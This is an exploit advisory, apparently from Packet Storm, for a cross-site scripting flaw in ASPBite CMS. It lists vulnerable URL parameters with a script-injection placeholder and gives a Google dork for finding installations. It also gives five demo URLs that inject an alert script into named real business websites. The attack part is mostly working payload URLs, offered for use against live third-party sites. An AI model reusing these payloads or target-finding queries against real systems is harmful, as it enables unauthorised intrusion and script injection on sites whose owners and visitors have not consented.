ASPBite CMS suffers from a cross site scripting vulnerability. Note that this finding houses site-specific data.
f5fe9e819792a60a03fcd3df39c3334929eae443fcdb63a7fbf762ce219168e5-----------IN THE NAME OF Allah--------------
Exploit : ASPBite CMS Content Management System Cross Site Scripting (XSS)
Discovered By : Mr.Cicili
CMS Download Page : http://aspbite.com
Google Dork : "inurl:content= inurl:aspbite/categories/index.asp?intCatID=" Or
"intext:Powered by ASPBite CMS Content Management System"
Exploit :
Put your Scripts here :
aspbite/categories/index.asp?intCatID="Id"&content={XSS}
aspbite/products/products.asp?intProductsID="id"&content={XSS}
aspbite/categories/index.asp?content={XSS}
Demo :
http://www.cookgroupltd.co.uk/aspbite/categories/index.asp?intCatID=66&content=<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
http://www.prsmanchester.co.uk//aspbite/categories/index.asp?content=<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
http://condensationproducts.co.uk/aspbite/products/products.asp?intProductsID=84&content=<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
http://www.yorkshiredampcourse.co.uk/aspbite/categories/index.asp?intCatId=68&content=<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
http://www.propertypreservationsystems.co.uk/aspbite/categories/index.asp?intCatID=52&content=<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
Tnx : M.R.S.CO - black.king - b3hz4d - skote_vahshat - IrIsT - G3n3Rall
4ut0n0m0us - SpooferNinja - Nafsh
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed